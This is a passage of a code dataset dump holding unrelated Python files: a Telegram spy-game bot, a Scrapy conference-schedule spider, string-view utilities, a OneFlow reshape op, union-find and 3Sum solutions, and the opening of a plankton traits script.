m.reply_to_message.from_user.id in games[chat]['users']:\n bot.send_message(m.chat.id, 'Он уже в игре!')\n # return\n if games[chat]['active']:\n bot.send_message(m.chat.id, 'Игра уже началась!')\n return\n temp_roles = games[chat]['roles']\n try:\n temp_role = rolelist[len(temp_roles)]\n except:\n bot.send_message(m.chat.id, 'Он не можете присоединится! 
Достигнуто маскимальное кол-во игроков.')\n temp_role = 'None'\n if temp_role != 'general' and games[chat]['spy'] is None:\n spy = random.choice([True, False])\n games[chat]['spy'] = m.reply_to_message.from_user.id\n else:\n spy = False\n games[chat]['players'].append(\n createuser(temp_role, m.reply_to_message.from_user.id, m.reply_to_message.from_user.first_name))\n games[chat]['roles'].append(temp_role)\n games[chat]['users'].append(m.reply_to_message.from_user.id)\n bot.send_message(chat,\n rusificate[temp_role] + ' ' + m.reply_to_message.from_user.first_name + ' присоединился к игре!')\n\n\n@bot.message_handler(commands=['kick'])\ndef addplayer(m):\n if m.from_user.id != creator:\n return\n game_id = m.chat.id\n chat = game_id\n if m.reply_to_message.from_user.id not in games[chat]['users']:\n bot.send_message(m.chat.id, 'Он еще не в игре!')\n return\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['id'] == m.reply_to_message.from_user.id:\n im = i\n break\n temp_role = games[game_id]['players'][im]['role']\n games[chat]['players'].remove(\n createuser(temp_role, m.reply_to_message.from_user.id, m.reply_to_message.from_user.first_name))\n games[chat]['roles'].remove(temp_role)\n games[chat]['users'].remove(m.reply_to_message.from_user.id)\n bot.send_message(chat, rusificate[temp_role] + ' ' + m.reply_to_message.from_user.first_name + ' удалился из игры!')\n\n\n@bot.message_handler(commands=['startgame'])\ndef start_game(m):\n if m.from_user.id != creator:\n return\n game_id = m.chat.id\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = True\n break\n if not game_exists:\n bot.send_message(m.chat.id, 'Игра еще не создана!')\n return\n games[game_id]['active'] = True\n for i in range(len(games[game_id]['users'])):\n desc = roles[games[game_id]['roles'][i]]['desc']\n if games[game_id]['players'][i]['spy']:\n desc += roles[games[game_id]['roles'][i]]['spy']\n else:\n desc += roles[games[game_id]['roles'][i]]['no_spy']\n bot.send_message(games[game_id]['users'][i], desc)\n bot.send_message(m.chat.id, 'Генерал выбирает где спрятать коды, пока работники еще спят...')\n general_id = games[game_id]['players'][0]['id']\n kb = types.InlineKeyboardMarkup()\n btns = list()\n btns2 = list()\n for cab in games[game_id]['cabinets']:\n if cab in [301, 302, 303, 304, 305]:\n btns.append(\n types.InlineKeyboardButton(cab, callback_data='first_hide_code_in {} {}'.format(cab, game_id)))\n elif cab in [201, 202, 203, 204, 205]:\n btns2.append(\n types.InlineKeyboardButton(cab, callback_data='first_hide_code_in {} {}'.format(cab, game_id)))\n kb.add(*btns)\n kb.add(*btns2)\n bot.send_message(general_id, 'Выберете, где спрячете коды...', reply_markup=kb)\n\n\n@bot.callback_query_handler(lambda c: True)\ndef callback_handler(c):\n text = c.data.split()\n action = text[0]\n game_id = text[2]\n game_id = int(game_id)\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = True\n break\n if not game_exists and not games[game_id]['active']:\n return\n if action == 'first_hide_code_in':\n cab_num = int(text[1])\n turn = games[game_id]['turn']\n games[game_id]['turn'] = turn + 1\n games[game_id]['codes'] = cab_num\n bot.edit_message_text('Вы спрятали коды в {} кабинете.'.format(cab_num), c.message.chat.id,\n c.message.message_id)\n bot.send_message(game_id, 'Генерал ' + c.from_user.first_name + ' спрятал коды!')\n next_turn(game_id)\n return\n elif action == 'nothing':\n bot.edit_message_text('Вы решили сегодня 
отдыхать.', c.message.chat.id, c.message.message_id)\n return\n elif action == 'steal_a_card':\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] != c.from_user.first_name:\n btns.append(types.InlineKeyboardButton(games[game_id]['players'][i]['name'],\n callback_data='2_steal_a_card {} {}'.format(str(i),\n game_id)))\n kb.add(*btns)\n bot.edit_message_text('У кого вы хотите украсть карточку доступа?', c.message.chat.id, c.message.message_id,\n reply_markup=kb)\n return\n elif action == '2_steal_a_card':\n user = int(text[1])\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n games[game_id]['players'][im]['al'] += games[game_id]['players'][user]['al']\n if games[game_id]['players'][im]['al'] > 3:\n games[game_id]['players'][im]['al'] = 3\n tts = 'Вы украли карточку доступа у {}. Теперь ваш уровень доступа: {}!'.format(\n games[game_id]['players'][user]['name'], str(games[game_id]['players'][im]['al']))\n bot.edit_message_text(tts, c.message.chat.id, c.message.message_id)\n games[game_id]['history'] += 'Сегодня у {} украли карточку доступа!\\n'.format(\n games[game_id]['players'][user]['name'])\n games[game_id]['acts'].append(\n 'Вы узнали, что {} украл карту доступа у {}!'.format(games[game_id]['players'][im]['name'],\n games[game_id]['players'][user]['name']))\n return\n elif action == 'see':\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n games[game_id]['players'][im]['see'] = True\n bot.edit_message_text('Сегодня вы решили подсматривать.', c.message.chat.id, c.message.message_id)\n return\n elif action == 'hear':\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n games[game_id]['players'][im]['see'] = True\n bot.edit_message_text('Сегодня вы решили слушать.', c.message.chat.id, c.message.message_id)\n return\n elif action == 'go_to_cabinet':\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in games[game_id]['cabinets']:\n if int(str(i)[0]) <= games[game_id]['players'][im]['al']:\n btns.append(types.InlineKeyboardButton(str(i), callback_data='2_go_to_cabinet {} {}'.format(str(i),\n game_id)))\n kb.add(*btns)\n bot.edit_message_text('В какой кабинет вы хотите пойти?', c.message.chat.id, c.message.message_id,\n reply_markup=kb)\n return\n elif action == '2_go_to_cabinet':\n cab = int(text[1])\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n if cab == games[game_id]['codes']:\n if games[game_id]['players'][im]['spy']:\n tts = 'Шпион {} нашел коды в {} кабинете! 
Он выиграл!'.format(games[game_id]['players'][im]['name'],\n str(cab))\n del games[game_id]\n bot.send_message(game_id, tts)\n bot.edit_message_text(tts, c.message.chat.id, c.message.message_id)\n else:\n games[game_id]['acts'].append(\n 'Вы узнали, что {} ходил в {} кабинет!'.format(games[game_id]['players'][im]['name'],\n str(cab)))\n games[game_id]['players'][im]['memory'] += 'Вы ничего не нашли в {} кабинете.'.format(str(cab))\n ptts = 'Вы собираетесь искать в {} кабинете.'.format(str(cab))\n bot.edit_message_text(ptts, c.message.chat.id, c.message.message_id)\n return\n elif action == 'arrest':\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] != c.from_user.first_name:\n btns.append(types.InlineKeyboardButton(games[game_id]['players'][i]['name'],\n callback_data='2_arrest {} {}'.format(str(i), game_id)))\n kb.add(*btns)\n bot.edit_message_text('Кого вы хотите посадить в тюрьму?', c.message.chat.id, c.message.message_id,\n reply_markup=kb)\n return\n elif action == '2_arrest':\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] != c.from_user.first_name:\n btns.append(types.InlineKeyboardButton(games[game_id]['players'][i]['name'],\n callback_data='2_arrest {} {}'.format(str(i), game_id)))\n kb.add(*btns)\n tts = 'Вы аррестовали {}!'\n bot.edit_message_text(tts, c.message.chat.id, c.message.message_id)\n return\n\n\ndef next_turn(game_id):\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = not game_exists\n if games[game_id]['active'] and game_exists:\n turn = games[game_id]['turn']\n workers = ''\n for i in range(len(games[game_id]['users'])):\n name = games[game_id]['players'][i]['name']\n role = rusificate[games[game_id]['players'][i]['role']]\n workers += '{} {}\\n'.format(role, name)\n tts = 'День {}. 
У вас есть 60 секунд на ход и обсуждение ситуации...\\n\\n{}\\nТекущие работники:\\n{}'.format(\n str(turn), games[game_id]['history'], workers)\n bot.send_message(game_id, tts)\n games[game_id]['history'] = ''\n for i in range(len(games[game_id]['users'])):\n kb = types.InlineKeyboardMarkup()\n btns = []\n h = games[game_id]['players'][i]['actions']\n user = games[game_id]['players'][i]['id']\n role = games[game_id]['players'][i]['role']\n for ids in h:\n btns.append(\n types.InlineKeyboardButton(rusificate[ids],\n callback_data='{} {} {}'.format(ids, str(user), str(game_id))))\n kb.add(*btns)\n if games[game_id]['players'][i]['see']:\n if games[game_id]['acts']:\n bot.send_message(user, random.choice(games[game_id]['acts']))\n else:\n bot.send_message(user, 'Вам ничего не удалось услышать!')\n games[game_id]['players'][i]['see'] = False\n if games[game_id]['players'][i]['memory'] != '':\n bot.send_message(user, games[game_id]['players'][i]['memory'])\n games[game_id]['players'][i]['memory'] = ''\n if not games[game_id]['players'][i]['arrested']:\n tts = 'Что вы будете делать сегодня, {}?\\n\\nВаш уровень доступа: {}.'.format(rusificate[role],\n games[game_id]['players'][\n i]['al'])\n bot.send_message(user, tts, reply_markup=kb)\n else:\n bot.send_message(user, 'Сегодня вы играли с бананом в тюрьме.', reply_markup=kb)\n games[game_id]['acts'] = []\n games[game_id]['turn'] = turn + 1\n threading.Timer(60, next_turn, [game_id]).start()\n else:\n return\n\n\ndef creategame():\n return {\n 'players': [],\n 'cabinets': [100, 101, 102, 103, 104, 105, 200, 201, 202, 203, 204, 205, 300, 301, 302, 303, 304, 305],\n 'codes': None,\n 'roles': [],\n 'users': [],\n 'spy': None,\n 'turn': 0,\n 'history': '',\n 'acts': [],\n 'active': False,\n }\n\n\ndef createuser(role, user, name, spy='None'):\n return {\n 'id': user,\n 'name': name,\n 'role': role,\n 'cabinet': roles[role]['cabinet'],\n 'al': roles[role]['al'],\n 'actions': roles[role]['actions'],\n 'spy': spy,\n 'see': False,\n 'memory': '',\n 'arrested': False\n }\n\n\nboottext = bot.get_me().username + ' is started!'\nprint(boottext.capitalize())\nbot.polling(none_stop=True, timeout=600)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459610049","text":"\n\n\n\nimport re\n\nimport scrapy\nfrom scrapy import Selector\n\nfrom ..Months import Months\n\nfrom ..items import PyconItem\n\n\nclass PyconSpider(scrapy.Spider):\n name = \"pycon\"\n start_urls = [\n 'https://2017.es.pycon.org/ca/schedule/',\n ]\n\n # Xpaths\n container_xpath = '//div[contains(@class, \"schedule\")]/div'\n date_xpath = './div[contains(@class, \"day\")]'\n slot_xpath = './div[contains(@class, \"slot-intermediate\") or contains(@class, \"slot-basic\") or contains(@class, \"slot-advanced\")]'\n\n # Xpath inside slot\n slot_level_xpath = './@class'\n inner_xpath = './/div[@class=\"slot-inner\"]'\n slot_id_xpath = inner_xpath + '/@data-slot'\n slot_hour_xpath = inner_xpath + '/strong/text()'\n slot_type_xpath = inner_xpath + '/span[@class=\"slot-kind\"]/text()'\n slot_title_xpath = inner_xpath + '/h3/a/text()'\n slot_url_xpath = inner_xpath + '/h3/a/@href'\n slot_language_xpath = inner_xpath + '/h3/a/small/text()'\n slot_speakers_xpath = inner_xpath + '/p/strong/text()'\n slot_room_xpath = inner_xpath + '/p[contains(@class, \"default-room\")]/text()'\n slot_description_xpath = '//div[@id=\"slot-description-{}\"]//p/text()'\n\n\n def 
__init__(self, tor=None, *args, **kwargs):\n super(PyconSpider, self).__init__(*args, **kwargs)\n self.tor = tor\n \"\"\"\n import sys\n sys.path.append('/home/jordi/opt/scrapy_pycon/pycharm-debug.egg')\n import pydevd\n pydevd.settrace('localhost', port=7502, stdoutToServer=True, stderrToServer=True)\n \"\"\"\n def parse(self, response):\n sel = Selector(response)\n divs_schedule = sel.xpath(self.container_xpath)\n\n items = []\n slot_date = ''\n for div_schedule in divs_schedule:\n # Check if current div is a \"date div\" and get the date\n if self.is_date(div_schedule):\n slot_date = self.get_date(div_schedule)\n\n # Check if current div is a slot and get their data\n if self.is_slot(div_schedule):\n for slot in div_schedule.xpath(self.slot_xpath):\n items.append(self.get_slot(slot, slot_date))\n\n return items\n\n\n def is_date(self, sel):\n \"\"\"\n If given selector is a date return True.\n :param sel: Selector\n :return: Boolean\n \"\"\"\n return True if sel.xpath(self.date_xpath) else False\n\n def is_slot(self, sel):\n \"\"\"\n\n :param sel: Selector\n :return: Boolean\n \"\"\"\n return True if sel.xpath(self.slot_xpath) else False\n\n def get_date(self, sel):\n \"\"\"\n Return string with date from selector\n :param sel: Selector\n :return: String\n \"\"\"\n date = sel.xpath(self.date_xpath + '/h2/text()')\n if date:\n date_str = date.extract_first()\n # Transform text date to iso date (YYYY-MM-DD)\n date_re = re.search('(?P\\d{2}) de (?P\\w+) de (?P\\d{4})', date_str)\n if date_re:\n day = date_re.group('day')\n month_str = date_re.group('month')\n year = date_re.group('year')\n month = Months.get_month_number(month_str)\n return '{}-{}-{}'.format(year, month, day)\n raise Exception(\"The date can't be gotten\")\n\n def get_slot(self, sel, date):\n \"\"\"\n\n :param sel: Selector\n :param date: String\n :return: PyconItem\n \"\"\"\n item = PyconItem()\n\n item['level'] = self.get_level(sel)\n item['id'] = sel.xpath(self.slot_id_xpath).extract_first()\n item['hour'] = sel.xpath(self.slot_hour_xpath).extract_first()\n item['type'] = sel.xpath(self.slot_type_xpath).extract_first()\n item['title'] = sel.xpath(self.slot_title_xpath).extract_first().strip()\n item['lang'] = sel.xpath(self.slot_language_xpath).extract_first().strip()\n item['speakers'] = sel.xpath(self.slot_speakers_xpath).extract_first().strip()\n item['room'] = sel.xpath(self.slot_room_xpath).extract_first().strip()\n item['description'] = sel.xpath(self.slot_description_xpath.format(item['id'])).extract_first().strip()\n item['date'] = date\n\n \"\"\"\n slot_url = sel.xpath(self.slot_room_xpath).extract_first().strip()\n if slot_url is not None:\n next_page = response.urljoin(slot_url)\n yield scrapy.Request(next_page, callback=self.parse_slot_detail)\n \"\"\"\n\n return item\n\n def get_level(self, sel):\n \"\"\"\n\n :param sel: Selector\n :return:\n \"\"\"\n slot_class = sel.xpath(self.slot_level_xpath)\n if 'basic' in slot_class:\n return 'basic'\n elif 'intermediate' in slot_class:\n return 'intermediate'\n else:\n return 'advanced'\n\n # def parse_slot_detail(self, response):","sub_path":"pycon/spiders/pycon_spider.py","file_name":"pycon_spider.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424715825","text":"import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"final_predictions_lstm_glove1_all_folds.csv\")\ndata.columns = [\"index\", \"problem_log_id\", \"grader_teacher_id\", \"grade_1_prob_all\", 
\"grade_2_prob_all\", \"grade_3_prob_all\", \"grade_4_prob_all\", \"grade_5_prob_all\" ]\ndata = data.drop(columns=[\"index\"])\ndata = data.astype({'problem_log_id': 'int64'}, copy=True)\ndata = data.astype({'grader_teacher_id': 'int64'}, copy=True)\n\nprint(data)\ndata.to_csv(\"predictions_lstm_glove1_all_folds.csv\")","sub_path":"clean_df.py","file_name":"clean_df.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561001516","text":"from __future__ import annotations\n\nfrom math import ceil\nfrom typing import TypeVar\n\n\nclass StringView:\n __slots__ = ('start', 'stop', 'data', '_hash_val')\n\n @staticmethod\n def wrap(data: str) -> StringView:\n return StringView(0, len(data), data)\n\n @staticmethod\n def empty() -> StringView:\n return StringView.wrap('')\n\n def startswith(self, prefix: str | StringView):\n if len(self) < len(prefix):\n return False\n for i in range(len(prefix)):\n if self[i] != prefix[i]:\n return False\n return True\n\n def endswith(self, suffix: str | StringView):\n if len(self) < len(suffix):\n return False\n for i in range(len(suffix)):\n if self[len(self) - i - 1] != suffix[i]:\n return False\n return True\n\n def __init__(self, start: int, stop: int, data: str):\n self.start = start\n self.stop = stop\n self.data = data\n self._hash_val = None\n\n def __len__(self):\n return self.stop - self.start\n\n def __getitem__(self, item):\n if isinstance(item, slice):\n if item.step is not None and item.step > 1:\n raise ValueError('Only step size of 1 allowed')\n # start\n if item.start is None:\n new_start = self.start\n elif item.start < 0:\n new_start = self.stop + item.start\n else:\n new_start = self.start + item.start\n # stop\n if item.stop is None:\n new_stop = self.stop\n elif item.stop < 0:\n new_stop = self.stop + item.stop\n else:\n new_stop = self.start + item.stop\n # oob check\n if new_start < self.start:\n new_start = self.start\n if new_stop > self.stop:\n new_stop = self.stop\n # return\n return StringView(new_start, new_stop, self.data)\n elif isinstance(item, int):\n if item < 0:\n i = self.stop + item\n return StringView(i, i + 1, self.data)\n else:\n i = self.start + item\n return StringView(i, i + 1, self.data)\n else:\n raise ValueError('Unsupported')\n\n def __contains__(self, key: str | StringView):\n if len(key) == 0:\n return True\n elif len(key) > 1:\n raise ValueError('Single character values only')\n return any(str(ch) == key for i, ch in enumerate(self))\n\n def __str__(self):\n return self.data[self.start:self.stop]\n\n def __repr__(self):\n return str(self)\n\n def __iter__(self):\n return (StringView(i, i+1, self.data) for i in range(self.start, self.stop))\n\n def __eq__(self, other: StringView | str):\n if not(isinstance(other, str) or isinstance(other, StringView)):\n return False\n if len(self) != len(other):\n return False\n for ch1, ch2 in zip(self, other):\n if str(ch1) != str(ch2):\n return False\n return True\n\n def __hash__(self):\n if self._hash_val is not None:\n return self._hash_val\n ret = 0\n for i, sv in enumerate(self):\n ret ^= hash((i, str(sv)))\n self._hash_val = ret\n return self._hash_val\n\n def __lt__(self, other: StringView | str):\n for ch1, ch2 in zip(self, other):\n if str(ch1) < str(ch2):\n return True\n if len(self) < len(other):\n return True\n return False\n\n def __add__(self, other: StringView | str):\n return StringView.wrap(str(self) + str(other))\n\n def __mul__(self, other: int):\n return 
StringView.wrap(str(self) * other)\n\n\n\n\n\nclass RotatedStringView:\n __slots__ = ('start', 'data')\n\n @staticmethod\n def wrap(data: str) -> RotatedStringView:\n return RotatedStringView(0, data)\n\n def __init__(self, start: int, data: str):\n self.start = start\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, item):\n if isinstance(item, int):\n if item >= len(self.data) or -(item + 1) >= len(self.data):\n raise ValueError(f'OOB {item}')\n if item > 0:\n return self.data[(self.start + item) % len(self.data)]\n else:\n return self.data[(self.start + item) % len(self.data)]\n else:\n raise ValueError('Unsupported')\n\n def __iter__(self):\n return (self.data[(self.start + i) % len(self.data)] for i in range(len(self.data)))\n\n def __str__(self):\n return ''.join(ch for ch in self)\n\n def __repr__(self):\n return str(self)\n\n def __lt__(self, other: RotatedStringView | str):\n for ch1, ch2 in zip(self, other):\n if str(ch1) < str(ch2):\n return True\n if len(self) < len(other):\n return True\n return False\n\n def __eq__(self, other: RotatedStringView | str):\n if not(isinstance(other, str) or isinstance(other, RotatedStringView)):\n return False\n if len(self) != len(other):\n return False\n for ch1, ch2 in zip(self, other):\n if str(ch1) != str(ch2):\n return False\n return True\n\n\n\n\n\nT = TypeVar('T')\n\n\nclass RotatedListView:\n __slots__ = ('start', 'data')\n\n @staticmethod\n def wrap(data: list[T]) -> RotatedListView:\n return RotatedListView(0, data)\n\n def __init__(self, start: int, data: list[T]):\n self.start = start\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, item):\n if isinstance(item, int):\n if item >= len(self.data) or -(item + 1) >= len(self.data):\n raise ValueError(f'OOB {item}')\n if item > 0:\n return self.data[(self.start + item) % len(self.data)]\n else:\n return self.data[(self.start + item) % len(self.data)]\n else:\n raise ValueError('Unsupported')\n\n def __iter__(self):\n return (self.data[(self.start + i) % len(self.data)] for i in range(len(self.data)))\n\n def __str__(self):\n return ''.join(str(e) for e in self)\n\n def __repr__(self):\n return str(self)\n\n def __lt__(self, other: RotatedListView | list[T]):\n for ch1, ch2 in zip(self, other):\n if str(ch1) < str(ch2):\n return True\n if len(self) < len(other):\n return True\n return False\n\n def __eq__(self, other: RotatedListView | list[T]):\n if not(isinstance(other, str) or isinstance(other, RotatedListView)):\n return False\n if len(self) != len(other):\n return False\n for ch1, ch2 in zip(self, other):\n if str(ch1) != str(ch2):\n return False\n return True\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n x = RotatedStringView(1, 'ABCDEF')\n print(f'{x}')\n# print(f'{x[0]}')\n# print(f'{x[1]}')\n# print(f'{x[2]}')\n# print(f'{x[3]}')\n# print(f'{x[4]}')\n# print(f'{x[5]}')\n# print()\n# print(f'{x[0]}')\n# print(f'{x[-5]}')\n# print(f'{x[-4]}')\n# print(f'{x[-3]}')\n# print(f'{x[-2]}')\n# print(f'{x[-1]}')\n\n\n\n\n\n\n\n\n\n# MARKDOWN\nS = TypeVar('S', StringView, str)\n\n\ndef to_seeds(\n seq: S,\n mismatches: int\n) -> list[S]:\n seed_cnt = mismatches + 1\n len_per_seed = ceil(len(seq) / seed_cnt)\n ret = []\n for i in range(0, len(seq), len_per_seed):\n capture_len = min(len(seq) - i, len_per_seed)\n ret.append(seq[i:i+capture_len])\n return ret\n\n\ndef seed_extension(\n test_sequence: S,\n found_seq_idx: int,\n found_seed_idx: int,\n seeds: list[S]\n) -> tuple[int, int] | None:\n prefix_len 
= sum(len(seeds[i]) for i in range(0, found_seed_idx))\n start_idx = found_seq_idx - prefix_len\n if start_idx < 0:\n return None # report out-of-bounds\n seq_idx = start_idx\n dist = 0\n for seed in seeds:\n block = test_sequence[seq_idx:seq_idx + len(seed)]\n if len(block) < len(seed):\n return None # report out-of-bounds\n dist += hamming_distance(seed, block)\n seq_idx += len(seed)\n return start_idx, dist\n# MARKDOWN\n\n\ndef hamming_distance(kmer1: S, kmer2: S) -> int:\n mismatch = 0\n for ch1, ch2 in zip(kmer1, kmer2):\n if ch1 != ch2:\n mismatch += 1\n return mismatch","sub_path":"docs/data/learn/Bioinformatics/input/ch9_code/src/sequence_search/SearchUtils.py","file_name":"SearchUtils.py","file_ext":"py","file_size_in_byte":8586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152575375","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport oneflow as flow\nfrom oneflow.python.nn.module import Module\nfrom oneflow.python.oneflow_export import oneflow_export, experimental_api\nfrom oneflow.python.framework.tensor import register_tensor_op\nfrom typing import Sequence\nfrom functools import reduce\nimport operator\n\n\ndef infer_shape(x, shape):\n dim_index_need_infer = shape.index(-1) if shape.count(-1) == 1 else None\n in_elem_cnt = reduce(operator.mul, x.shape, 1)\n out_elem_cnt = reduce(operator.mul, shape, 1)\n if dim_index_need_infer is not None:\n assert (in_elem_cnt % out_elem_cnt) == 0\n shape[dim_index_need_infer] = int(abs(in_elem_cnt / out_elem_cnt))\n else:\n assert in_elem_cnt == out_elem_cnt\n return shape\n\n\nclass Reshape(Module):\n def __init__(self, shape: Sequence[int]) -> None:\n super().__init__()\n\n assert isinstance(shape, tuple) or isinstance(shape, list)\n shape = list(shape)\n assert all(dim == -1 or dim > 0 for dim in shape)\n assert shape.count(-1) <= 1\n self.shape = shape\n\n def forward(self, x):\n new_shape = infer_shape(x, self.shape)\n return flow.F.reshape(x, shape=new_shape)\n\n\n@oneflow_export(\"reshape\")\n@register_tensor_op(\"reshape\")\n@experimental_api\ndef reshape_op(x, shape: Sequence[int] = None):\n \"\"\"This operator reshapes a Tensor.\n\n We can set one dimension in `shape` as `-1`, the operator will infer the complete shape.\n\n Args:\n x: A Tensor.\n shape: Shape of the output tensor.\n Returns:\n A Tensor has the same type as `x`.\n\n For example:\n\n .. code-block:: python\n\n >>> import numpy as np\n >>> import oneflow.experimental as flow\n >>> flow.enable_eager_execution()\n\n >>> x = np.array(\n ... [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]]\n ... 
).astype(np.float32)\n >>> input = flow.Tensor(x)\n\n >>> y = flow.reshape(input, shape=[2, 2, 2, -1]).numpy().shape\n >>> print(y)\n (2, 2, 2, 2)\n\n \"\"\"\n return Reshape(shape=shape)(x)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(raise_on_error=True)\n","sub_path":"oneflow-master-zj/oneflow/python/nn/modules/reshape.py","file_name":"reshape.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"410957553","text":"# https://cityofsalinas.opendatasoft.com/pages/developers/\n\nimport requests, json\n\n# use the search API to request data from the 'collisions' dataset\ndataParams = {\n 'dataset':'collisions', # specify dataset identifier\n 'format':'json', # specify json format\n 'q' : 'objectid = 1503' # do a full text query for objectid = 1503\n}\n\n# send the post request\np = requests.post('https://cityofsalinas.opendatasoft.com/api/records/1.0/download/', data=dataParams)\njson_data = json.loads(p.text) # read the response as JSON\n\n# print the data in the resulting record\nfor key in json_data[0]['fields']:\n print('{} : {}'.format(key, json_data[0]['fields'][key]))","sub_path":"python/REST/test_requests.py","file_name":"test_requests.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"375231327","text":"# class UnionFind():\n# def __init__(self, n):\n# self.n = n\n# self.parents = [-1] * n\n\n# def find(self, x):\n# if self.parents[x] < 0:\n# return x\n# else:\n# self.parents[x] = self.find(self.parents[x])\n# return self.parents[x]\n\n# def union(self, x, y):\n# x = self.find(x)\n# y = self.find(y)\n\n# if x == y:\n# return\n\n# if self.parents[x] > self.parents[y]:\n# x, y = y, x\n\n# self.parents[x] += self.parents[y]\n# self.parents[y] = x\n\n# def size(self, x):\n# return -self.parents[self.find(x)]\n\n# def same(self, x, y):\n# return self.find(x) == self.find(y)\n\n# def members(self, x):\n# root = self.find(x)\n# return [i for i in range(self.n) if self.find(i) == root]\n\n# def roots(self):\n# return [i for i, x in enumerate(self.parents) if x < 0]\n\n# def group_count(self):\n# return len(self.roots())\n\n# def all_group_members(self):\n# return {r: self.members(r) for r in self.roots()}\n\n# def __str__(self):\n# return '\\n'.join('{}: {}'.format(r, self.members(r)) for r in self.roots())\n\nclass UnionFind():\n par = []\n sizes = []\n\n def __init__(self, N):\n self.par = [i for i in range(N)]\n self.sizes = [1 for _ in range(N)]\n\n def root(self, x: int)-> int:\n if (self.par[x] == x):\n return x\n self.par[x] = self.root(self.par[x])\n return self.par[x]\n\n def unite(self, x: int, y: int):\n rootX = self.root(x)\n rootY = self.root(y)\n if rootX == rootY:\n return\n self.par[rootX] = rootY\n self.sizes[rootY] += self.sizes[rootX]\n\n def maxSize(self)-> int:\n return max(self.sizes)\n\ndef friends(N, As):\n uf = UnionFind(N)\n setAs = list(set(As))\n for val in setAs:\n uf.unite(val[0]-1, val[1]-1)\n # ans = 0\n ans = uf.maxSize()\n # for i in range(N):\n # temp = uf.size(i)\n # if ans < temp:\n # ans = temp\n return ans\n\nif __name__ == \"__main__\":\n nm = list(map(int, input().split()))\n As =[tuple(map(int, input().split())) for _ in range(nm[1])]\n print(friends(nm[0], 
As))","sub_path":"Python_codes/p02573/s582398934.py","file_name":"s582398934.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"32762708","text":"# Time Complexity : O(n**2)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : Unique values in result list\n\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n nums.sort()\n # print(nums)\n retList = []\n for i in range(len(nums)-2):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n left = i + 1\n right = len(nums) - 1\n while left < right:\n summ = nums[i] + nums[left] + nums[right]\n # print(summ)\n if summ < 0:\n left += 1\n elif summ > 0:\n right -= 1\n else:\n retList.append([nums[i], nums[left], nums[right]])\n while left < right and nums[left] == nums[left + 1]:\n left = left + 1\n while left < right and nums[right] == nums[right - 1]:\n right = right - 1\n left += 1\n right -= 1\n return retList\n ","sub_path":"3Sum.py","file_name":"3Sum.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329641002","text":"import numpy as np\nimport pandas as pd\nfrom scipy.stats import linregress\nimport warnings\n\nimport phytoplankton_traits as pt\n\n# traits relevant for pyhtoplankton growth rates\nzoop_traits = [\"size_Z\", \"mu_Z\", \"c_Z\", \"m_Z\", \"k_Z\"]\n\n# to store empirically measured data\nraw_data = pd.DataFrame(columns = zoop_traits) \nallo_scal = {} # allometric scaling parameters\n\n########################\n# growth rates\ngrowth = pd.read_csv(\"empirical_data/growth_rates_brun2017.csv\",\n encoding = 'ISO-8859-1')\ngrowth = growth[[\"Body mass (mg)\", \"Specific growth (15°C)\"]]\ngrowth.columns = 